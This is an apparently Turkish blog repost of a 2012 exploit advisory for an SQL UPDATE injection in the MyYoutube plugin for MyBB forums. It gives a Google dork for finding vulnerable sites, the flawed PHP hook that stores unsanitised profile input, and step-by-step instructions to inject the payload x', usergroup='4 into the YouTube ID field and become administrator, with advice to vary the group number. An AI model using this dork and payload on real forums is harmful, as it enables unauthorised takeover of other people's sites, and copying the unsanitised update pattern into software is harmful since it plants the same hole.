MyYoutube MyBB plugin SQL UPDATE injection

MyYoutube MyBB plugin SQL UPDATE injection açığı bulunmuş olup, açığın oluşumu ve açıkla ilgili source codeler aşağıdadır. Açık bulucunun açıkla ilgili anlatımları şu şekilde;



# Exploit Title: MyYoutube MyBB plugin SQL UPDATE injection.





# Google Dork: inurl:member.php intext:"Youtube Video" intitle:"Profile of"





# Date: 12.10.2012





# Exploit Author: Zixem





# Vendor Homepage: http://www.mybb-es.com





# Software Link: http://mods.mybb.com/view/myyoutube





# Version: 1.0





# Tested on: Linux.





 





MyYoutube plugin suffers from POST SQL UPDATE injection.





 





The vulnerabillity exist within youtube.php :





<?php





 





$plugins->add_hook("datahandler_user_update", "youtube_update"); /*Line 8*/ 





 





function youtube_update($ytb) /*Line 128*/





 {





    global $mybb;





    if(isset($mybb->input['ytb']))





    {





        $ytb->user_update_data['ytb'] = $mybb->input['ytb'];





    }





}





 





?>





 





Insturctions:





(1) Go to usercp.php?action=profile





 





(2) http://i.imgur.com/gPYdq.png





Enter this in the youtube ID field(just like in the picture): x', usergroup='4





 





(3) Press on the update button.





 





(4) You're an admin now :3





 





 





If you're still not admins, just play with the number...on my pentest forum, the admins usergroup number is 4.





 





PoC: 





before: http://i.imgur.com/aPFsz.png





While exploiting: http://i.imgur.com/gPYdq.png





Result: http://i.imgur.com/4ezpF.png





 





 





http://twitter.com/z1xem





 





-Zixem

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir